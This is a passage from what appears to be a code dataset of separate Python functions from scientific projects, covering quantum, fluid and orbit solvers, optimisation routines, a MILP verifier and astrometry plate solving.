{}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly,adjust the f(x) into > alpha_0; \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;\n for i in range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # 更新内部ALPHA;\n \"\"\" Secondly,adjust the alpha_0 < p_min(y_n) < q_min(x_n)\"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # 找到结论中谓词的最小多项式值\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # 不满足小于结论最小值的那些环的TARGET_ALPHA更新; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # 优化不满足小于结论最小值的那些环 \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;", "def solver(direc):\r\n\r\n # open inputfile\r\n file = 'schroedinger.inp'\r\n fn = os.path.join(direc, file)\r\n inp_all = open(fn, 'r')\r\n\r\n # read parameters from inputfile\r\n lines = inp_all.readlines()\r\n inp_mass = lines[0].split()[0]\r\n mass = float(inp_mass)\r\n inp_xmin = lines[1].split()[0]\r\n xmin = float(inp_xmin)\r\n inp_xmax = lines[1].split()[1]\r\n xmax = float(inp_xmax)\r\n inp_npoint = lines[1].split()[2]\r\n npoint = int(inp_npoint)\r\n inp_firsteigval = lines[2].split()[0]\r\n firsteigval = int(inp_firsteigval)\r\n inp_lasteigval = lines[2].split()[1]\r\n lasteigval = int(inp_lasteigval)\r\n interpoltype = lines[3].split()[0]\r\n inp_nrinterpolpoints = lines[4].split()[0]\r\n nrinterpolpoints = int(inp_nrinterpolpoints)\r\n len_pot = len(lines)-5\r\n xpot = np.zeros(len_pot)\r\n ypot = np.zeros(len_pot)\r\n for ii in range(5, len_pot+5):\r\n xpot[ii - 5] = float(lines[ii].split()[0])\r\n ypot[ii - 5] = float(lines[ii].split()[1])\r\n\r\n # read interpolation type and interpolate the potential\r\n xx = np.linspace(xmin, xmax, npoint)\r\n if interpoltype == 'linear':\r\n pot = np.interp(xx, xpot, ypot)\r\n elif interpoltype == 'polynomial':\r\n degree = int(nrinterpolpoints - 1)\r\n coef = np.polyfit(xpot, ypot, degree)\r\n polf = np.poly1d(coef)\r\n pot = polf(xx)\r\n elif interpoltype == 'cspline':\r\n cubicf = interp1d(xpot, ypot, kind='cubic')\r\n pot = cubicf(xx)\r\n else:\r\n print('interpolation type not found')\r\n sys.exit(1)\r\n\r\n # save x- and y-values for interpolated potential in potential.dat file\r\n potential = np.array([xx, pot])\r\n xypotential = potential.T\r\n np.savetxt(os.path.join(direc, 'potential.dat'), xypotential)\r\n\r\n # formulate matrix-problem for the discretised Schroedinger equation\r\n matrix = np.zeros((npoint, npoint))\r\n delta = abs((xmax-xmin)/(npoint))\r\n aa = 1/(mass*(delta)**2)\r\n for ii in range(1, npoint):\r\n matrix[ii, ii-1] = -aa/2\r\n for ii in range(0, npoint):\r\n matrix[ii, ii] = aa+pot[ii]\r\n for ii in range(0, npoint-1):\r\n matrix[ii, ii+1] = -aa/2\r\n\r\n # compute eigenvalues and eigenvectors\r\n energy, wavefunc = scipy.linalg.eigh(matrix, eigvals=(int(firsteigval-1),\r\n int(lasteigval-1)))\r\n\r\n # normalize wavefunctions\r\n deltavec = delta*np.ones((1, npoint))\r\n wavefunc_sq = wavefunc**2\r\n norm_sq = np.dot(deltavec, wavefunc_sq)\r\n norm = 1/(np.sqrt(norm_sq))\r\n norm_wavefunc = np.dot(wavefunc, np.diag(np.reshape(norm,\r\n (len(energy), ))))\r\n\r\n # save eigenvalues and eigenvectors in energies.dat and wavefuncs.dat files\r\n np.savetxt(os.path.join(direc, 'energies.dat'), energy)\r\n wavefuncs = np.hstack((xx.reshape((npoint, 1)), norm_wavefunc))\r\n np.savetxt(os.path.join(direc, 'wavefuncs.dat'), wavefuncs)\r\n\r\n # compute expectation values and uncertainty for the position\r\n exp_value = np.zeros(lasteigval-firsteigval+1)\r\n exp_value_sq = np.zeros(lasteigval-firsteigval+1)\r\n uncert_x = np.zeros(lasteigval-firsteigval+1)\r\n for ii in range(firsteigval-1, lasteigval):\r\n exp_value[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx)\r\n exp_value_sq[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx**2)\r\n uncert_x[ii] = np.sqrt(exp_value_sq[ii]-exp_value[ii]**2)\r\n\r\n # save expectation values and uncertainty for the position in expvalues.dat\r\n expvalues = np.array([exp_value, uncert_x])\r\n datexpvalues = expvalues.T\r\n np.savetxt(os.path.join(direc, 'expvalues.dat'), datexpvalues)\r\n\r\n return xypotential, energy", "def solve(self):\n start = timer()\n # encode into milp\n me = MILPEncoder(MILPSolver.prob,\n MILPSolver.params.logger.LOGFILE, \n MILPSolver.params.INTRA_DEP_CONSTRS,\n MILPSolver.params.INTER_DEP_CONSTRS)\n if MILPSolver.lp == True:\n gmodel = me.lp_encode()\n else:\n gmodel = me.encode()\n # Set gurobi parameters\n pgo = 1 if MILPSolver.params.PRINT_GUROBI_OUTPUT == True else 0\n gmodel.setParam('OUTPUT_FLAG', pgo)\n tl = MILPSolver.params.TIMEOUT\n if tl != -1 : gmodel.setParam('TIME_LIMIT', tl)\n if not MILPSolver.params.DEFAULT_CUTS: \n MILPSolver.disable_default_cuts(gmodel)\n gmodel._vars = gmodel.getVars()\n # set callback cuts \n MILPSolver.id_form = IdealFormulation(MILPSolver.prob,\n gmodel, \n MILPSolver.params.IDEAL_FREQ,\n MILPSolver.params.logger.LOGFILE)\n MILPSolver.dep_cuts = DepCuts(MILPSolver.prob,\n gmodel,\n MILPSolver.params.DEP_FREQ,\n MILPSolver.params.INTRA_DEP_CUTS,\n MILPSolver.params.INTER_DEP_CUTS,\n MILPSolver.sip_params,\n MILPSolver.params.logger.LOGFILE)\n # Optimise\n if MILPSolver.params.callback_enabled() and MILPSolver.lp == False:\n gmodel.optimize(MILPSolver._callback)\n else:\n gmodel.optimize()\n\n runtime = timer() - start\n cex = None \n if MILPSolver.status == SolveResult.BRANCH_THRESHOLD:\n result = SolveResult.BRANCH_THRESHOLD\n elif gmodel.status == GRB.OPTIMAL:\n cex_shape = MILPSolver.prob.spec.input_layer.input_shape\n cex = np.zeros(cex_shape)\n for i in itertools.product(*[range(j) for j in cex_shape]):\n cex[i] = MILPSolver.prob.spec.input_layer.out_vars[i].x\n result = SolveResult.UNSATISFIED\n elif gmodel.status == GRB.TIME_LIMIT:\n result = SolveResult.TIMEOUT\n elif gmodel.status == GRB.INTERRUPTED:\n result = SolveResult.INTERRUPTED\n elif gmodel.status == GRB.INFEASIBLE or gmodel.status == GRB.INF_OR_UNBD:\n result = SolveResult.SATISFIED\n else:\n result = SolveResult.UNKNOWN\n \n # MILPSolver.logger.info('Verification problem {} solved, '\n # 'LP: {}, '\n # 'time: {:.2f}, '\n # 'result: {}.'\n # .format(MILPSolver.prob.id,\n # MILPSolver.lp,\n # runtime,\n # result.value))\n \n return SolveReport(result, runtime, cex)", "def _set_up_acq_opt_rand(self):\n def _random_max_wrap(*args):\n \"\"\" A wrapper so as to only return optimal point.\"\"\"\n _, opt_pt = random_maximise(*args)\n return opt_pt\n # Set this up in acq_optimise\n self.acq_optimise = lambda obj, max_evals: _random_max_wrap(obj, self.domain_bounds,\n max_evals)\n if self.get_acq_opt_max_evals is None:\n lead_const = 10 * min(5, self.domain_dim)**2\n self.get_acq_opt_max_evals = lambda t: np.clip(\n lead_const * np.sqrt(min(t, 1000)), 2000, 3e4)\n # Acquisition function should be evaluated via multiple evaluations\n self.acq_query_type = 'multiple'", "def construct_inv_boundaries(params,par_dict,eq_dict,K_RC,K_CP,m_P):\n #intrapop params\n q1=par_dict['q1']\n q2=par_dict['q2']\n K =par_dict['K']\n m_C= K_CP*m_P\n q10 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n\n #interpop params\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n\n #eq values\n\n #L-V\n R_eq_s2 = eq_dict['R_eq_s2']\n C_eq_s2 = eq_dict['C_eq_s2']\n P_eq_s3 = eq_dict['P_eq_s3']\n R_eq_s3 = eq_dict['R_eq_s3']\n #R-M\n R_eq_s2RM = eq_dict['R_eq_s2RM']\n C_eq_s2RM = eq_dict['C_eq_s2RM']\n R_eq_s3RM = eq_dict['R_eq_s3RM']\n P_eq_s3RM = eq_dict['P_eq_s3RM']\n \n ##Invasibility boundaries\n\n #L-V\n I_C_s2 = set_I_C_s2(e1,a1,K,q1)\n I_P_s3 = set_I_P_s3(e2,a2,K,q2)\n I_P_s4 = set_I_P_s4(e2,e3,a2,a3,q2,R_eq_s2,C_eq_s2)\n I_C_s5 = set_I_C_s5(e1,a1,a3,R_eq_s3,P_eq_s3,q1)\n \n #R-M\n I_C_s2RM = set_I_C_s2RM(e1,a1,K,q1,hC0,q10)\n I_P_s3RM = set_I_P_s3RM(e2,a2,K,q2,hP0,q20)\n I_P_s4RM = set_I_P_s4RM(e2,e3,a2,a3,q2,R_eq_s2RM,C_eq_s2RM,hP0,q20)\n I_C_s5RM = set_I_C_s5RM(e1,e2,a1,a3,m_C,R_eq_s3RM,P_eq_s3RM,q1,t_hc,q10,q20,hP0,hC0) \n\n inv_dict= {'I_C_s2':I_C_s2,'I_P_s3':I_P_s3,'I_P_s4':I_P_s4,'I_C_s5':I_C_s5,\n 'I_C_s2RM':I_C_s2RM,'I_P_s3RM':I_P_s3RM,'I_P_s4RM':I_P_s4RM,'I_C_s5RM':I_C_s5RM}\n\n return inv_dict", "def _compute_guess_p(rho_l, u_l, p_l, c_l, rho_r, u_r, p_r, c_r):\n quser = 2.0\n p_linearized = 0.5 * (p_l + p_r) + 0.5 * (u_l - u_r) * \\\n 0.25 * (rho_l + rho_r) * (c_l + c_r)\n p_linearized = max(0.0, p_linearized)\n p_min = min(p_l, p_r)\n p_max = max(p_l, p_r)\n qmax = p_max / p_min\n if(\n qmax <= quser and (p_min <= p_linearized and\n p_linearized <= p_max)\n ):\n \"\"\"A Primitive Variable Riemann Solver (PMRS)\"\"\"\n return p_linearized\n else:\n \"\"\"A Two-Rarefaction Riemann Solver (TRRS)\"\"\"\n if p_linearized < p_min:\n p_lr = (p_l / p_r)**gm1_2g\n u_linearized = (p_lr * u_l / c_l + u_r / c_r + (2 / gm1) *\n (p_lr - 1.0)) / (p_lr / c_l + 1.0 / c_r)\n return (\n 0.5 * (p_l * (1.0 + gm1_2 * (u_l - u_linearized) /\n c_l)**(1.0 / gm1_2g) +\n p_r * (1.0 + gm1_2 * (u_linearized - u_r) / c_r) **\n (1.0 / gm1_2g))\n )\n else:\n \"\"\"A Two-Shock Riemann Solver (TSRS)\"\"\"\n gL = sqrt(((2 / gp1) / rho_l) /\n (gm1_gp1 * p_l + p_linearized))\n gR = sqrt(((2 / gp1) / rho_r) /\n (gm1_gp1 * p_r + p_linearized))\n return (gL * p_l + gR * p_r - (u_r - u_l)) / (gL + gR)", "def correct(self):\n stop_flag = False\n self.orbit_class.online_calc = False\n # read orbit devs\n for elem in self.orbit.corrs:\n try:\n elem.kick_mrad = elem.mi.get_value()\n except Exception as e:\n stop_flag = True\n logger.warning(elem.id + \" reading error: \" + str(e))\n return stop_flag\n \n elem.angle_read = elem.kick_mrad*1e-3\n elem.i_kick = elem.kick_mrad\n elem.ui.set_init_value(elem.kick_mrad)\n elem.ui.set_value(elem.kick_mrad)\n elem.transfer_map = self.parent.lat.method.create_tm(elem)\n if elem.ui.alarm:\n stop_flag = True\n logger.warning(\"correct - STOP: corrector shows alarm: \" + elem.id)\n\n\n #self.parent.lat.update_transfer_maps()\n\n for elem in self.orbit.bpms:\n if elem.id not in self.new_ref_orbit.keys():\n logger.warning(\"correct - STOP: BPM is not in new ref orbit: \" + elem.id)\n stop_flag = True\n return stop_flag\n elem.x = self.new_ref_orbit[elem.id][0]\n elem.y = self.new_ref_orbit[elem.id][1]\n elem.ui.set_value((elem.x*1000., elem.y*1000.))\n if elem.ui.alarm:\n logger.warning(\"correct - STOP: BPM shows alarm: \" + elem.id)\n stop_flag = True\n if stop_flag:\n return stop_flag\n self.orbit_class.online_calc = True\n\n\n if not self.orbit_class.is_rm_ok(self.orbit):\n logger.error(\" correct: Calculate Response Matrix\")\n self.parent.error_box(\"Calculate Response Matrix\")\n return 0\n\n self.orbit_class.golden_orbit.dict2golden_orbit()\n\n if self.orbit_class.ui.cb_close_orbit.isChecked():\n self.orbit_class.close_orbit()\n\n self.calc_correction = {}\n for cor in self.orbit.corrs:\n cor.angle = 0.\n self.calc_correction[cor.id] = cor.angle\n\n alpha = 0.\n\n self.orbit.correction(alpha=alpha, p_init=None, beta=0, print_log=False)\n for cor in self.orbit.corrs:\n self.calc_correction[cor.id] = cor.angle\n\n self.set_values2correctors()\n return stop_flag", "def solve(self, state, times):", "def set_optimizer_params(self):\n n_params = len(self.optim_params)\n if self.optimizer_name == 'GradientDescent' and n_params == 1:\n self.optimizer = tf.keras.optimizers.SGD(\n learning_rate=self.optim_params[0],\n momentum=0)\n elif self.optimizer_name == 'Momentum' and n_params == 2:\n self.optimizer = tf.keras.optimizers.SGD(\n learning_rate=self.optim_params[0],\n momentum=self.optim_params[1])\n elif self.optimizer_name == 'AdaGrad' and n_params == 2:\n self.optimizer = tf.keras.optimizers.Adagrad(\n learning_rate=self.optim_params[0],\n initial_accumulator_value=self.optim_params[1])\n elif self.optimizer_name == 'AdaDelta' and n_params == 2:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n rho=self.optim_params[1])\n elif self.optimizer_name == 'RMSProp' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n rho=self.optim_params[1],\n momentum=self.optim_params[2])\n elif self.optimizer_name == 'Adam' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n beta_1=self.optim_params[1],\n beta_2=self.optim_params[2])\n elif self.optimizer_name == 'Nadam' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Nadam(\n learning_rate=self.optim_params[0],\n beta_1=self.optim_params[1],\n beta_2=self.optim_params[2])\n else:\n raise Exception(\"[ERROR] Wrong optimizer or parameters for \"\n \"optimizer\")", "def process_solve_kwargs(**kwargs):\n\n tol = kwargs.get('tol', DEFAULT_TOL)\n maxiter = kwargs.get('maxiter', MAX_ITER)\n Ainv = kwargs.get('Ainv', None)\n verbose = kwargs.get('verbose', False)\n\n if VERBOSE:\n print(\"tol:\", tol)\n print(\"maxiter:\", maxiter)\n print(\"Ainv:\", Ainv)\n\n return tol, int(maxiter), Ainv, verbose", "def _set_up_acq_opt(self):\n # First set up function to get maximum evaluations.\n if isinstance(self.options.acq_opt_max_evals, int):\n if self.options.acq_opt_max_evals > 0:\n self.get_acq_opt_max_evals = lambda t: self.options.acq_opt_max_evals\n else:\n self.get_acq_opt_max_evals = None\n else: # In this case, the user likely passed a function here.\n self.get_acq_opt_max_evals = self.options.acq_opt_max_evals\n # Additional set up based on the specific optimisation procedure\n if self.options.acq_opt_criterion == 'direct':\n self._set_up_acq_opt_direct()\n elif self.options.acq_opt_criterion == 'rand':\n self._set_up_acq_opt_rand()\n else:\n raise NotImplementedError('Not implemented acquisition optimisation for %s yet.'%(\n self.options.acq_opt_criterion))", "def solve(self, F, u0=None, maxiter=100, rtol=1.e-6, rtol2=1.e-6 \\\n , verbose=False, update=False):\n # assembly the stifness matrix and bc terms\n poisson.assembly(self, update=update)\n\n # project u0 onto the discrete vectorial space\n self.initialize(u0=u0)\n\n # ...\n PDE = self\n V = PDE.space\n un = PDE.unknown\n rhs = self.rhs\n # ...\n\n rhs.func = F\n\n # ...\n from time import time\n list_Err = [1.e6]\n list_ErrH1 = [1.e6]\n un_values = un.get()\n normH1_old = np.dot(PDE.dot(un.get()), un.get())\n i = 0\n if verbose:\n tb = time()\n while (list_Err[-1] > rtol) and (list_ErrH1[-1] > rtol2) and (i < maxiter):\n U_old_values = un.get()\n# print \"-------\"\n# print \"solve\"\n# import matplotlib.pyplot as plt\n## Phi = PDE.G_W\n# Phi = PDE.unknown_dirichlet\n## Phi.plot(withpcolor=True) ; plt.colorbar() ; plt.show()\n# Phi.fast_plot() ; plt.colorbar() ; plt.show()\n# print \"-------\"\n\n # assembly the right hand side\n rhs.reset()\n self.update()\n # solve and update unew\n poisson.solve(self, rhs)\n\n U_values = un.get()\n err = np.linalg.norm(U_values-U_old_values)\n list_Err.append(err)\n\n normH1 = np.dot(PDE.dot(un.get()), un.get())\n list_ErrH1.append(np.abs(normH1-normH1_old))\n\n normH1_old = normH1\n\n i += 1\n if verbose:\n print(i, \": \",\" |F(x)| = \", list_Err[-1],\" |DF(x)| = \", list_ErrH1[-1])\n if verbose:\n te = time()\n print(\">> Elapsed time \", te-tb)\n\n list_Err = np.asarray(list_Err[1:])\n list_ErrH1 = np.asarray(list_ErrH1[1:])\n return list_Err, list_ErrH1", "def solve(\n self, preconditioner='none', tol=1e-5,\n operator_parameters=None, preconditioner_parameters=None\n ):\n time_assemble = -time.clock() # start timer\n\n self.operator = self.assemble_operator(operator_parameters)\n self.rhs = self.assemble_rhs(operator_parameters)\n\n if preconditioner == 'none':\n super_operator = self.operator\n super_rhs = self.rhs\n elif preconditioner == 'diagonal':\n diagonal = self.get_diagonal(preconditioner_parameters) \n super_operator = diagonal * self.operator\n super_rhs = diagonal * self.rhs\n elif preconditioner == 'self':\n preconditioner = self.get_op_as_preconditioner(preconditioner_parameters)\n super_operator = preconditioner * self.operator\n super_rhs = preconditioner * self.rhs\n # elif preconditioner == 'electric-interior':\n # pass\n else:\n raise NotImplementedError(\n \"Preconditioner '%s' not supported\" % preconditioner)\n\n if hasattr(super_operator, 'strong_form'):\n super_operator.strong_form(True)\n \n time_assemble += time.clock() # stop timer\n\n bempp.api.MATVEC_COUNT = 0 # reset the MATVEC counter to 0\n solve_time = -time.clock() # initialise the timer\n sol, solve_info, residuals = self._gmres(super_operator, super_rhs, tol)\n solve_time += time.clock() # stop the timer\n matvec_count = bempp.api.MATVEC_COUNT # sample the matvec counter\n \n info = dict(\n status=solve_info,\n time_solve=solve_time,\n time_assemble=time_assemble,\n matvec_count=matvec_count\n )\n if isinstance(sol[0], np.complex128):\n return Solution(coefficients=sol, info=info, residuals=residuals, system=self) \n else:\n return Solution(traces=sol, info=info, residuals=residuals, system=self)", "def solve(self, solver={}, fitsPath='', raHint=None, decHint=None, scaleHint=None,\n radius=2, timeout=30, updateFits=False):\n\n self.process = None\n self.result = {'success': False}\n\n if not solver:\n return False\n if not os.path.isfile(fitsPath):\n self.result['message'] = 'image missing'\n return False\n\n tempPath = self.tempDir + '/temp.xy'\n configPath = self.tempDir + '/astrometry.cfg'\n solvedPath = self.tempDir + '/temp.solved'\n wcsPath = self.tempDir + '/temp.wcs'\n binPathImage2xy = solver['programPath'] + '/image2xy'\n binPathSolveField = solver['programPath'] + '/solve-field'\n\n if os.path.isfile(wcsPath):\n os.remove(wcsPath)\n\n cfgFile = self.tempDir + '/astrometry.cfg'\n with open(cfgFile, 'w+') as outFile:\n outFile.write('cpulimit 300\\n')\n outFile.write(f'add_path {solver[\"indexPath\"]}\\n')\n outFile.write('autoindex\\n')\n\n # using sextractor in astrometry.net and KStars\n \"\"\"\n with open('default.param', 'w+') as outFile:\n outFile.write('MAG_AUTO Kron-like elliptical aperture magnitude [mag]\\n')\n outFile.write('X_IMAGE Object position along x [pixel]\\n')\n outFile.write('Y_IMAGE Object position along y [pixel]\\n')\n\n with open('default.conv', 'w+') as outFile:\n outFile.write('CONV NORM\\n')\n outFile.write('1 2 1\\n')\n outFile.write('2 4 2\\n')\n outFile.write('1 2 1\\nn')\n \"\"\"\n suc = self.runImage2xy(binPath=binPathImage2xy,\n tempPath=tempPath,\n fitsPath=fitsPath,\n timeout=timeout,\n )\n if not suc:\n self.log.error(f'image2xy error in [{fitsPath}]')\n self.result['message'] = 'image2xy failed'\n return False\n\n raFITS, decFITS, scaleFITS, _, _ = self.readFitsData(fitsPath=fitsPath)\n\n # if parameters are passed, they have priority\n if raHint is None:\n raHint = raFITS\n if decHint is None:\n decHint = decFITS\n if scaleHint is None:\n scaleHint = scaleFITS\n\n searchRatio = 1.1\n ra = transform.convertToHMS(raHint)\n dec = transform.convertToDMS(decHint)\n scaleLow = scaleHint / searchRatio\n scaleHigh = scaleHint * searchRatio\n options = ['--scale-low',\n f'{scaleLow}',\n '--scale-high',\n f'{scaleHigh}',\n '--ra',\n f'{ra}',\n '--dec',\n f'{dec}',\n '--radius',\n f'{radius:1.1f}',\n ]\n\n # split between ekos and cloudmakers as cloudmakers use an older version of\n # solve-field, which need the option '--no-fits2fits', whereas the actual\n # version used in KStars throws an error using this option.\n if 'Astrometry.app' in solver['programPath']:\n options.append('--no-fits2fits')\n\n suc = self.runSolveField(binPath=binPathSolveField,\n configPath=configPath,\n tempPath=tempPath,\n options=options,\n timeout=timeout,\n )\n if not suc:\n self.log.error(f'solve-field error in [{fitsPath}]')\n self.result['message'] = 'solve-field error'\n return False\n\n if not os.path.isfile(solvedPath):\n self.log.info(f'solve files for [{fitsPath}] missing')\n self.result['message'] = 'solve failed'\n return False\n\n if not os.path.isfile(wcsPath):\n self.log.info(f'solve files for [{wcsPath}] missing')\n self.result['message'] = 'solve failed'\n return False\n\n with fits.open(wcsPath) as wcsHDU:\n wcsHeader = self.getWCSHeader(wcsHDU=wcsHDU)\n\n with fits.open(fitsPath, mode='update') as fitsHDU:\n solve, header = self.getSolutionFromWCS(fitsHeader=fitsHDU[0].header,\n wcsHeader=wcsHeader,\n updateFits=updateFits)\n fitsHDU[0].header = header\n\n self.result = {\n 'success': True,\n 'solvedPath': fitsPath,\n 'message': 'Solved',\n }\n self.result.update(solve)\n\n return True", "def do_optimisation(self):\n\n print('--> Parameters for optimisation:')\n print('--> Using measurements : {}'.format(self.stoma_cfg.comparison_helper.optimisation_keys))\n print('')\n\n x0 = self.initial_guess()\n\n tol, eps = 1e-4, 0.001\n\n print('--> Using SLSQP with tol={} and eps={}'.format(tol, eps))\n\n soln = opt.minimize(fun=self.optimise_fn,\n x0=x0,\n method='SLSQP',\n tol=tol,\n options={'eps': eps})\n\n print('*' * 120)\n print('--> Optimisation procedure has finished...')\n print(soln)\n print('*' * 120)\n\n if soln.success:\n print('--> Optimisation succeeded. Result is...')\n self._set_material_parameters(soln.x)\n print('--> {}'.format(self.material_model))\n else:\n print('--> The optimisation failed!')\n\n print('*' * 120)\n\n return soln", "def _propagateOrbits(self, orbits, t1):\n err = \"This backend does not have orbit propagation implemented.\"\n raise NotImplementedError(err)", "def contract_tenors(self):\n\n\tself.r_outer_r[:,:,0,1,:] = self.r_outer_r[:,:,0,1,:]/(1. - self.k_dot_r[0,1,:])\n\tself.r_outer_r[:,:,0,2,:] = self.r_outer_r[:,:,0,2,:]/(1. - self.k_dot_r[0,2,:])\n\t\n\tself.r_outer_r[:,:,1,0,:] = self.r_outer_r[:,:,1,0,:]/(1. - self.k_dot_r[1,0,:])\n\tself.r_outer_r[:,:,1,2,:] = self.r_outer_r[:,:,1,2,:]/(1. - self.k_dot_r[1,2,:])\n\t\n\tself.r_outer_r[:,:,2,0,:] = self.r_outer_r[:,:,2,0,:]/(1. - self.k_dot_r[2,0,:])\n\tself.r_outer_r[:,:,2,1,:] = self.r_outer_r[:,:,2,1,:]/(1. - self.k_dot_r[2,1,:])\n\n\tself.delta_l = np.zeros((3,3,self.N),dtype=np.complex_)\n \n\tself.delta_l[0,1,:] = get_l(self,0,1)\n\tself.delta_l[1,0,:] = get_l(self,1,0)\n\t\n\tself.delta_l[0,2,:] = get_l(self,0,2)\n\tself.delta_l[2,0,:] = get_l(self,2,0)\n\t\n\tself.delta_l[1,2,:] = get_l(self,1,2)\n\tself.delta_l[2,1,:] = get_l(self,2,1)\n \n\treturn", "def updateParameters(self):\n\n if self.params[1].value:\n if arcpy.Exists(self.params[1].value):\n try:\n min_value = arcpy.GetRasterProperties_management(self.params[1].value, \"MINIMUM\")[0]\n\n if str(self.params[8].value) != str(self.params[1].value):\n self.params[7].value = True\n self.params[8].value = str(self.params[1].value)\n else:\n self.params[7].value = False\n\n if str(min_value) == \"0\":\n if self.params[7].value == True:\n self.params[2].value = True\n self.params[3].enabled = True\n self.params[7].value = False\n else:\n self.params[2].value = False\n self.params[3].enabled = False\n\n except arcpy.ExecuteError:\n pass\n\n if self.params[2].value == True:\n self.params[3].enabled = True\n else:\n self.params[3].enabled = False", "def apply_inplace(self, array: Tuple['Nparray', ...]) -> None:\n\n len_arr = len(array)\n if (len_arr < 1 or len_arr > 4):\n raise ValueError(\"Number of operators in tuple must be \"\n \"between 1 and 4.\")\n\n # Get the first numpy array (i.e. a non-None object) in array\n # and use its dimensions to determine whether we have spatial or spin orbitals\n # Necessary since 1-body operator cam be absent\n array_for_dimensions = next(\n filter(lambda x: isinstance(x, numpy.ndarray), array), False)\n\n if isinstance(array_for_dimensions, bool):\n # this can only be False\n assert (not array_for_dimensions)\n return\n\n spatial = array_for_dimensions.shape[0] == self.norb()\n ## check correct dimensions in case of spin orbitals\n if not spatial and array_for_dimensions.shape[0] != 2 * self.norb():\n raise ValueError(\"Inconsistent number of spin-orbitals in \"\n \"operators and wavefunction.\")\n if len_arr == 1:\n if spatial:\n self.coeff = self._apply_array_spatial1(array[0])\n else:\n self.coeff = self._apply_array_spin1(array[0])\n elif len_arr == 2:\n if spatial:\n self.coeff = self._apply_array_spatial12(array[0], array[1])\n else:\n self.coeff = self._apply_array_spin12(array[0], array[1])\n elif len_arr == 3:\n if spatial:\n self.coeff = self._apply_array_spatial123(\n array[0], array[1], array[2])\n else:\n self.coeff = self._apply_array_spin123(array[0], array[1],\n array[2])\n elif len_arr == 4:\n if spatial:\n self.coeff = self._apply_array_spatial1234(\n array[0], array[1], array[2], array[3])\n else:\n self.coeff = self._apply_array_spin1234(array[0], array[1],\n array[2], array[3])", "def _redef_sp1_vars(self):\r\n\r\n if len(self.fq_list) == 0:\r\n no_rad = True\r\n lst_tmp = np.matrix(np.reshape(self.lst_tmp, \r\n (self.lst_tmp.size, 1)))\r\n else: no_rad = False\r\n # The practically constants...\r\n # Big Epsilon:\r\n if self.cond == True:\r\n self.Epsilon = self.d_T * self.thermal_conductivity\r\n else:\r\n self.Epsilon = (self.diff_scale ** 2) / \\\r\n (3.0 * self.absorb_coeffs[self.rad] ** 2)\r\n # Beta:\r\n if self.cond == True:\r\n self.Beta = (self.diff_scale * 